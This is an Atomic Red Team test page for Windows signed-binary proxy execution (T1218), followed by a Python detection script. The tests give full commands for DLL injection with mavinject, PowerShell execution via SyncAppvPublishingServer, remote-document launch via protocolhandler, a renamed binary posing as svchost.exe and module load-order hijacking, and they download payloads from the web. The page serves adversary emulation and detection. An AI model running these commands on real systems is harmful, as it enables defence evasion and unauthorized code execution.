# T1218 - Signed Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft-signed binaries that are present by default on Windows installations can be used to proxy execution of other files.

## Atomic Tests

## Atomic Test #1 - mavinject - Inject DLL into running process

Injects an arbitrary DLL into the running process specified by process ID. Requires Windows 10.

**Supported Platforms:** Windows

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_id | PID of process receiving injection | string | 1000 |
| dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll |

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
```

#### Dependencies: Run with `powershell`!

##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})

##### Check Prereq Commands:

```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
```


## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

**Supported Platforms:** Windows

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe |

#### Attack Commands: Run with `command_prompt`!

```cmd
SyncAppvPublishingServer.exe "n; #{powershell_code}"
```


## Atomic Test #3 - Register-CimProvider - Execute evil dll

Executes an arbitrary DLL. Requires at least Windows 8/2012. Note that the DLL can also be served via SMB.

**Supported Platforms:** Windows

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll |

#### Attack Commands: Run with `command_prompt`!

```cmd
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
```

#### Dependencies: Run with `powershell`!

##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})

##### Check Prereq Commands:

```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
```


## Atomic Test #4 - InfDefaultInstall.exe .inf Execution

Tests execution of a .inf file using InfDefaultInstall.exe.

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml

**Supported Platforms:** Windows

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf |

#### Attack Commands: Run with `command_prompt`!

```cmd
InfDefaultInstall.exe #{inf_to_execute}
```

#### Dependencies: Run with `powershell`!

##### Description: INF file must exist on disk at specified location (#{inf_to_execute})

##### Check Prereq Commands:

```powershell
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
```


## Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File

Emulates an attack via documents through the protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.

**Supported Platforms:** Windows

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx |

#### Attack Commands: Run with `command_prompt`!

```cmd
FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
```

#### Dependencies: Run with `powershell`!

##### Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided

##### Check Prereq Commands:

```powershell
# Resolve the wildcard Office path first; the nested double quotes in the original one-liner did not parse.
$office = Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16" -ErrorAction SilentlyContinue | Select-Object -First 1
if ($office -and (Test-Path (Join-Path $office.Path "protocolhandler.exe"))) {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
write-host "Install Microsoft Word or provide correct path."
```


## Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution

Emulates an attack with Microsoft.Workflow.Compiler.exe running a .NET assembly that launches calc.exe.

**Supported Platforms:** Windows

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xml_payload | XML to execute | path | PathToAtomicsFolder\T1218\src\T1218.xml |
| mwcpath | Default location of Microsoft.Workflow.Compiler.exe | Path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319 |
| mwcname | Default name of microsoft.workflow.compiler.exe | Path | microsoft.workflow.compiler.exe |

#### Attack Commands: Run with `powershell`!

```powershell
#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt
```

#### Dependencies: Run with `powershell`!

##### Description: .NET must be installed for this test to work correctly.

##### Check Prereq Commands:

```powershell
if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
write-host ".Net must be installed for this test to work correctly."
```


## Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions

Emulates an attack with a renamed Microsoft.Workflow.Compiler.exe running a .NET assembly that launches calc.exe.

**Supported Platforms:** Windows

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xml_payload | XML to execute | path | PathToAtomicsFolder\T1218\src\T1218.xml |
| renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder\T1218\src\svchost.exe |
| mwcpath | Default location of Microsoft.Workflow.Compiler.exe | Path | C:\Windows\Microsoft.NET\Framework64\v4.0.30319 |
| mwcname | Default name of microsoft.workflow.compiler.exe | Path | microsoft.workflow.compiler.exe |

#### Attack Commands: Run with `powershell`!

```powershell
#{renamed_binary} #{xml_payload} output.txt
```

#### Dependencies: Run with `powershell`!

##### Description: .NET must be installed for this test to work correctly.

##### Check Prereq Commands:

```powershell
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
write-host "you need to rename workflow compiler before you run this test"
```


## Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test

RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).

One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking", where a module containing, in this case, an implementation of Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.

Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.

The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.

Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

**Supported Platforms:** Windows

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| module_name | Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. | string | foo |
| module_path | Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. | string | $PWD |

#### Attack Commands: Run with `powershell`!

```powershell
Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}
```

#### Dependencies: Run with `powershell`!

##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.

##### Check Prereq Commands:

```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
```

##### Get Prereq Commands:

```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
```
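As an added defender-side example (not part of the Atomic Red Team page or project), the following Python pairs each test above with the command-line argument it depends on and runs those rules over constructed Sysmon Event ID 1 style records; the field names `Image`, `CommandLine` and `OriginalFileName` follow Sysmon, and the sample values, including the `OriginalFileName` strings, are constructed rather than taken from the real binaries.

```python
"""Detection rules for the T1218 proxy-execution atomics listed above.

Each rule pairs a signed binary with the argument the atomic test relies on,
so a benign invocation of the binary alone does not alert.
"""
import ntpath
import re

# One rule per atomic test: (alert name, expected binary name, argument regex).
RULES = [
    ("mavinject DLL injection", "mavinject.exe", r"/INJECTRUNNING"),
    ("SyncAppvPublishingServer PowerShell", "syncappvpublishingserver.exe", r'"?n;'),
    ("Register-CimProvider DLL load", "register-cimprovider.exe", r"-Path\s+\S+\.dll"),
    ("InfDefaultInstall INF execution", "infdefaultinstall.exe", r"\S+\.inf"),
    ("Office protocolhandler remote document", "protocolhandler.exe", r"ms-word:nft\|u\|"),
    ("Workflow.Compiler assembly execution", "microsoft.workflow.compiler.exe", r'\S+\.xml"?\s+\S+'),
    ("RemoteFXvGPUDisablement module hijack", "remotefxvgpudisablement.exe", r"\bDisable\b"),
]


def classify(event):
    """Return the alert names an event matches.

    The binary is identified by OriginalFileName when present, so a renamed
    copy (Atomic Test #7) is still matched by its rule and flagged separately.
    """
    image_name = ntpath.basename(event.get("Image", "")).lower()
    original = (event.get("OriginalFileName") or image_name).lower()
    hits = []
    if original != image_name:
        hits.append(f"renamed signed binary ({original} running as {image_name})")
    for name, binary, arg_re in RULES:
        if original == binary and re.search(arg_re, event.get("CommandLine", ""), re.IGNORECASE):
            hits.append(name)
    return hits


# Constructed sample events mirroring the tests above (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mavinject.exe", "OriginalFileName": "mavinject.exe",
     "CommandLine": r"mavinject.exe 1000 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll"},
    {"Image": r"C:\Windows\System32\SyncAppvPublishingServer.exe", "OriginalFileName": "SyncAppvPublishingServer.exe",
     "CommandLine": 'SyncAppvPublishingServer.exe "n; Start-Process calc.exe"'},
    {"Image": r"C:\Users\alice\Documents\svchost.exe", "OriginalFileName": "Microsoft.Workflow.Compiler.exe",
     "CommandLine": r"svchost.exe C:\AtomicRedTeam\atomics\T1218\src\T1218.xml output.txt"},
    {"Image": r"C:\Windows\System32\mavinject.exe", "OriginalFileName": "mavinject.exe",
     "CommandLine": "mavinject.exe /?"},  # benign usage query, must not alert
]


def scan(events=SAMPLE_EVENTS):
    """Return {event index: [alert names]} for every event that triggered a rule."""
    return {i: hits for i, e in enumerate(events) if (hits := classify(e))}
```

Some Microsoft binaries legitimately carry an OriginalFileName that differs from their on-disk name, so the rename check should be baselined against known-good pairs before it is used as a high-severity alert.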